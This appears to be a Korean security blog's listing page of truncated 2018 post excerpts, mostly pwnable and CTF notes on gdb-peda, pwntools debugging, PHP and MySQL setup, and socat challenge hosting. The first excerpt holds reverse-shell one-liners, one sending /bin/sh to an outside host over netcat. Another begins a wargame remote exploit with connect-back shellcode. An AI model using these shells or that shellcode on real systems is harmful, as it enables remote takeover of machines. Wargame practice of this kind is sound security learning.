리버스 커넥션 (리버스 쉘) sleep 1000 | telnet localhost 5555 | /bin/sh | telnet localhost 6666nc localhost 5555 | /bin/sh | nc localhost 6666sh >&4 0 &4 ; exec 0 > &4; sh;(4는 fd 넘버) rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc dongmin2.tk 7777 >/tmp/f pwnable 2018.07.09
peda 명령어 이것저것 gdb-peda$ elfsymbol readread의 plt, got 확인 gdb-peda$ vmmap메모리 주소 확인 (libc, binary 주소 등) gdb-peda$ p/x system - readsystem함수와 read함수 거리 계산 (16진수) gdb-peda$ shell lsshell 다음에 쉘명령어 gdb-peda$ ropgadgetrop 가젯 찾기 gdb-peda$ ropsearch 'pop rdi'특정 rop 가젯 찾기 pwnable 2018.07.09
urllib urldecode url디코드 import urllib str = "blah blah" print urllib.unquote(str).decode('utf8') 웹 2018.07.09
pwntools로 익스 중에 디버깅 (gdb 등) io = process('./binary') gdb.attach(proc.pidof(io)[0]) context(terminal = ['xterm', 'splitw']) 하고 attach 따로 해주면 된다. bp는 따로 걸어줘야됨 gdb.attach(s,'c\n') ----------------------------------------- context.terminal=['tmux', 'splitw', '-h'] s = process('./test') gdb.attach(s) 한다음에 tmux 키고 익스 실행하면 새 창 띄워준다 창 옮기는 법 ctrl + b 떼고 o 누르면 옮겨진다 (ctrl+b+는 창 위치 바꾸기) ---------------------------- recv send 바이트 단위로 보.. pwnable 2018.06.29
MySQL 계정 생성, 권한 부여 create user 'webbased'@'%' identified by 'webbased';grant all privileges on webbased.* to 'webbased'@'%';grant select on webbased.* to 'webbased'@'%';flush privileges; 웹/MySQL 2018.05.28
PHP 설치 각종 설정 php 레포추가sudo add-apt-repository ppa:ondrej/php 설치 후 엔진이 꺼져있을 때apt-get install libapache2-mod-php 혹은 apt-get install libapache2-mod-php7.0 현재 PHP 7.2을 사용중인데 PHP 5.6으로 디폴트 버전을 변경sudo a2dismod php7.2 ; sudo a2enmod php5.6 ; sudo service apache2 restartsudo update-alternatives --set php /usr/bin/php5.6 현재 PHP 5.6을 사용중인데 PHP 7.2로 디폴트 버전을 변경sudo a2dismod php5.6 ; sudo a2enmod php7.2 ; sudo service apa.. 웹/PHP 2018.03.20
JSP 디렉터리 모음 *.jsp/var/lib/tomcat8/webapps/ROOT server.xml, web.xml/etc/tomcat8 웹/JSP,tomcat 2018.03.09
xavius remote exploit bruteforce from pwn import * import sys # gdb-peda # shellcode generate x86/linux 4444 192.168.3.136 shellcode = ( "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\xc0\xa8\x03\x80\x66\x68" "\x11\x5c\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" "\x89\xe1\xb0\x0b\xcd\x80".. write-up/LoB 2018.01.21
socat으로 바이너리 열기 (포너블 문제낼 때) socat tcp-listen:8888,reuseaddr,fork,bind=0.0.0.0 exec:./runme #!/bin/bashwhile true;do socat TCP4-LISTEN:8888,reuseaddr,fork EXEC:/runme,stderr;done------------------------------------------setvbuf(stdout, 0LL, 2, 0LL);setvbuf(stdin, 0LL, 2, 0LL);------------------------------------------gcc에서 인라인 어셈 할 땐 att 문법을 써야한다.상수 앞에는 $, 레지스터 앞에는 %asm ("mov $1, %rax;""int $0x80;" "pop %rdi;""pop %rsi;""po.. pwnable 2018.01.08